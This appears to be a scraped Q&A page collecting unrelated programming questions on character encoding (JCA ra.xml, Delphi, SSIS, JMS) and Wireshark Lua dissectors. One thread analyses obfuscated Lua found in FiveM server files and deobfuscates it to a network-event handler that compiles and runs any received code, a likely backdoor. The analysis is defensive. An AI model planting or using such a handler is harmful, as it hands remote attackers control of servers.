What should the JCA deployment descriptor (ra.xml) character encoding be? - character-encoding

Looking through JCA 1.7 specification I could only find in one of their examples on the Resource Adapter Deployment Descriptor the following (Chapter 13: Message Inflow P 13-50):
This example is showing the usage of UTF-8 encoding, however there is nothing saying if this was an optional selection for the example illustration or a must restriction on the file character encoding.
I'm asking this because I'm writing a Java program to read one of these files and FindBugs™ is giving me this message:
DM_DEFAULT_ENCODING: Reliance on default encoding
Found a call to a method which will perform a byte to String (or
String to byte) conversion, and will assume that the default platform
encoding is suitable. This will cause the application behaviour to
vary between platforms. Use an alternative API and specify a charset
name or Charset object explicitly.
Line 4 in this Java code snippet is where character encoding will be specified:
01. byte[] contents = new byte[1024];
02. int bytesRead = 0;
03. while ((bytesRead = bin.read(contents)) != -1)
04. result.append(new String(contents, 0, bytesRead));
So, Is it possible to specify the expected encoding of this file in this case or not?

From what I saw, Most people use the UTF-8 encoding for their ra.xml. However there is no restriction on using other encoding. So if you base your parsing to expect UTF-8 only, the result might not be as expected.
So you either need to count for this in your code when you are reading this as a normal text, or read it as an xml file and save yourself the headache. I don't think the difference in performance will be an issue because the ra.xml files do not usually grow to gigabytes. At least the ones I've seen so far are on an average of few megabytes.
For the Findbug issue, you just need to specify the encoding as a UTF-8. Otherwise you will be using the default of the JVM which is determined during virtual-machine startup and typically depends upon the locale and charset of the underlying operating system. Although using the default is not a recommended behavior here, if that is what you want then just specify the usage of default encoding. This would get rid of the Findbug issue.
So your code would look like something like this:
01. byte[] contents = new byte[1024];
02. int bytesRead = 0;
03. while ((bytesRead = bin.read(contents)) != -1)
04. result.append(new String(contents, 0, bytesRead, Charset.defaultCharset()));

FindBugs just warns you that you're relying on default system encoding, so it's possible that if your application will be launched by another user in another country you might get unexpected results. It's better to explicitly specify which encoding you want to use.
In your case the actual encoding should be extracted from XML file. There are several ways to get it. One method is to use XMLStreamReader as described in this answer.

Related

Does this line of Lua code contain any malicious activities?

So while looking at some server files (FiveM/GTA RP Server Files) my friend sent me, I found a line of code that was placed all over the Server's Resources, is it malicious?, since i checked "Hex to ASCII Text String Converter", it looks like it might be an attempt to inject some code into the Lua environment. The code creates a table with several strings that are encoded in hexadecimal format. These strings are then used to access elements in the global environment (_G) and call them as functions. The code also sets up an event listener for the "load" event, which could indicate that the code is intended to run when a specific event occurs in the environment.
Code:
local ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G}
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[1]
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[3]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[2],
function(BFWCBOOqrwrVwzdmKcQZBRMziBAgjQbWLfBPFXhZUzCWlOjKNLUGOYvDisfytJZwIDtHyn)
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6]ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[4]()
end)local
ASCII Text to Hex Code Converter
Image
ASCII Text to Hex Code Converter
Response 2
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG is just a variable name. It's not a very nice one, but it is just a variable name.
{"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64"}
is the table:
{"RegisterNetEvent", "helpCode", "AddEventHandler", "assert", "load"}
with the bytes encoded as hex bytes rather than literal characters.
This deobfuscates to:
local funcs = {
"RegisterNetEvent",
"helpCode",
"AddEventHandler",
"assert",
"load",
_G
};
funcs[6][funcs[1]](funcs[2]);
funcs[6][funcs[3]](funcs[2], function(param)
(funcs[6][funcs[4]](funcs[6][funcs[5]](param)))();
end);
Tables in Lua are 1-indexed, so this further deobfuscates to
_G["RegisterNetEvent"]("helpCode");
_G["AddEventHandler"]("helpCode", function(param)
(_G["assert"](_G["load"](param)))();
end);
And could be simplified to
RegisterNetEvent("helpCode")
AddEventHandler("helpCode", function(param)
assert(load(param))()
end)
While it doesn't look blatantly malicious, it does appear to directly compile and invoke raw code received via the "helpCode" network event, which is certainly dangerous if it's used maliciously. It's possible that this is part of some funny dynamic plugin system, but it's equally possible that it's a backdoor designed to give a network attacker command-and-control over the process.
load is not an event, but the global function used to compile code from a string. The essentially causes the script to listen for a helpCode network event, receive whatever payload from the network event, compile it as Lua code, and execute it. Given that it doesn't even attempt to do any sandboxing of the load'd code, I wouldn't run this without a very comprehensive understanding of how it's being used.

How to use add_packet_field in a Wireshark Lua dissector?

I am stumbling my way through writing a dissector for our custom protocol in Lua. While I have basic field extraction working, many of our fields have scale factors associated with them. I'd like to present the scaled value in addition to the raw extracted value.
It seems to me tree_item:add_packet_field is tailor-made for this purpose. Except I can't get it to work.
I found Mika's blog incredibly helpful, and followed his pattern for breaking my dissector into different files, etc. That's all working.
Given a packet type "my_packet", I have a 14-bit signed integer "AOA" that I can extract just fine
local pref = "my_packet"
local m = {
aoa = ProtoField.new("AOA", pref .. ".aoa", ftypes.INT16, nil, base.DEC, 0x3FFF, "angle of arrival measurement"),
}
local option=2
local aoa_scale = 0.1
function m.parse(tree_arg, buffer)
if option == 1 then
-- basic field extraction. This works just fine. The field is extracted and added to the tree
tree_arg:add(m.aoa, buffer)
elseif option == 2 then
-- This parses and runs. The item is decoded and added to the tree,
-- but the value of 'v' is always nil
local c,v = tree_arg:add_packet_field(m.aoa, buffer, ENC_BIG_ENDIAN)
-- this results in an error, doing arithmetic on 'nil'
c:append_text(" (scaled= " .. tostring(v*aoa_scale) .. ")")
end
end
(I use ProtoField.new instead of any of the type-specific variants for consistency in declaring my fields)
The documentation for add_packet_field says that the encoding argument is mandatory.
There is a README in the source code that says ENC_BIG_ENDIAN should be specified for network byte-order data (mine is). I know that section is for proto_tree_add_item, but I traced the code far enough to see that add_packet_field ends up passing the encoding to proto_tree_add_item.
Basically, at this point, I'm lost. I did find this post from 2014 that suggested limited support for add_packet_field but surely by now something as basic as an integer value is supported?
Also, I do know how to declare a Field and extract the value after tree:add does the parsing; worst case I'll fall back to that, but surely there is a more expedient way to access the just-parsed value added to the tree?
Wireshark Version
3.2.4 (v3.2.4-0-g893b5a5e1e3e)
Compiled (64-bit) with Qt 5.12.8, with WinPcap SDK (WpdPack) 4.1.2, with GLib
2.52.3, with zlib 1.2.11, with SMI 0.4.8, with c-ares 1.15.0, with Lua 5.2.4,
with GnuTLS 3.6.3 and PKCS #11 support, with Gcrypt 1.8.3, with MIT Kerberos,
with MaxMind DB resolver, with nghttp2 1.39.2, with brotli, with LZ4, with
Zstandard, with Snappy, with libxml2 2.9.9, with QtMultimedia, with automatic
updates using WinSparkle 0.5.7, with AirPcap, with SpeexDSP (using bundled
resampler), with SBC, with SpanDSP, with bcg729.
Running on 64-bit Windows 10 (1803), build 17134, with Intel(R) Xeon(R) CPU
E3-1505M v6 # 3.00GHz (with SSE4.2), with 32558 MB of physical memory, with
locale English_United States.1252, with light display mode, without HiDPI, with
Npcap version 0.9991, based on libpcap version 1.9.1, with GnuTLS 3.6.3, with
Gcrypt 1.8.3, with brotli 1.0.2, without AirPcap, binary plugins supported (19
loaded).
Built using Microsoft Visual Studio 2019 (VC++ 14.25, build 28614).
Looking at the try_add_packet_field() source code, only certain FT_ types are supported, namely:
FT_BYTES
FT_UINT_BYTES
FT_OID
FT_REL_OID
FT_SYSTEM_ID
FT_ABSOLUTE_TIME
FT_RELATIVE_TIME
None of the other FT_ types are supported [yet], including FT_UINT16, which is the one you're interested in here, i.e., anything else just needs to be done the old fashioned way.
If you'd like this to be implemented, I'd suggest filing a Wireshark enhancement bug request for this over at the Wireshark Bug Tracker.

Default TEncoding.UTF8 discarding invalid blocks of data in TStreamReader input

I'm using a TStreamReader to read data from a file that purports to be utf-8. I have no problem reading the file until it comes to a section containing what appears to me to be a UTF-8 "£" symbol with the preceding xC2 missing - the file only contains the xA3 part of the character. I've traced this through the run-time library until it calls
Result := UnicodeFromLocaleChars(FCodePage, FMBToWCharFlags,
PAnsiChar(Bytes), ByteCount, nil, 0);
which returns 0 indicating that it doesn't like the input. Unfortunately the TStreamReader simply ends up discarding this buffer of input and then continues with the rest of the file without raising an error. This is extremely misleading about what the problem but that is just a side issue.
The issue appears to be a "defect" in the UTF-8 TEncoding class in that it simply discards the results of a failed conversion whilst the TStreamReader assumes that this isn't the behaviour of TEncoding.
I can work around this by using
Reader := TStreamReader.Create(FileStream, TMBCSEncoding.Create(CP_UTF8, 0, 0));
instead of
Reader := TStreamReader.Create(FileStream, TEncoding.UTF8);
as this makes it ignore the corrupt UTF-8 and simply include something (I haven't checked what) in my output. However, I would like to combine allowing the data through with reporting it and there doesn't seem to be any obvious way of doing this as the behaviour is hidden deep within the library.
Does anyone know of any standard Delphi library tools for doing this or do I need to resort to a lot of custom code?

Avoiding SSIS script task to convert utf-8 to unicode for AS400 data to SQL Server

After many tries I have concluded that the optimal way to transfer with SSIS data from AS400 (non-unicode) to SQL Server is:
Use native transfer utility to dump data to tsv (tab delimited)
Convert files from utf-8 to unicode
Use bulk insert to put them into SQL Server
In #2 step I have found a ready made code that does this:
string from = #"\\appsrv02\c$\bg_f0101.tsv";
string to = #"\\appsrv02\c$\bg_f0101.txt";
using (StreamReader reader = new StreamReader(from, Encoding.UTF8, false, 1000000))
using (StreamWriter writer = new StreamWriter(to, false, Encoding.Unicode, 1000000))
{
while (!reader.EndOfStream)
{
var line = reader.ReadLine();
if (line.Length > 0)
writer.WriteLine(line);
}
}
I need to fully understand what is happening here with the encoding and why this is necessary.
How can I replace this script task with a more elegant solution?
I don't have much insight into exactly why you need the utf-8 conversion task, except to say that SQL server - I believe - uses UCS-2 as its native storage format, and this is similiar to UTF-16 which is what your task converts the file to. I'm surprised SSIS can't work with a UTF-8 input source though.
My main point is to answer the "How could I replace this script task with a more elegant solution?":
I have had a lot of success using HiT OLEDB/400 Server. It allows you to set up your AS/400 / iSeries / System i / whatever IBM are calling it this week as a linked server in SQL server, and you can then access the 400's data directly from the server its linked to using the standard 4 part SQL syntax, e.g. SELECT * FROM my400.my400.myLib.myFile.
Or even better, it's much more efficient as a passthrough query using EXEC...AT.
Using this you would not need SSIS at all, you'd just need a simple stored proc with that does an insert into your destination table direct from the 400 data.

Encoding a JMS TextMessage

I'm receiving messages from a JMS MQ queue which are supposedly utf-8 encoded. However on reading the out using msgText = ((TextMessage)msg).getText();
I get question marks where non standard characters were present. It seems possible to specify the encoding when using a bytemessage, but I cant find a way to specify encoding while reading out the TextMessage. Is there a way to solve this, or should I press for bytemessages?
We tried adding Dfile.encoding="UTF-8" to Websphere's jvm and we added
source = new StreamSource(new ByteArrayInputStream(
((TextMessage) msg).getText().getBytes("UTF-8")));
In our MessageListener. This worked for us, so then we took out the Dfile.encoding bit away and it still works for us.
Due to preferred minimum configuration for Websphere we decided to leave it this way, also taking into account that we may easier switch the UTF-8 string by a setting from file or database.
If the text is not decoded correctly, then probably the client is not sending the message with the utf-8 codec; this should work:
byte[] by = ((TextMessage) msg).getText().getBytes("ISO-8859-1");
String text = new String(by,"UTF-8");

Resources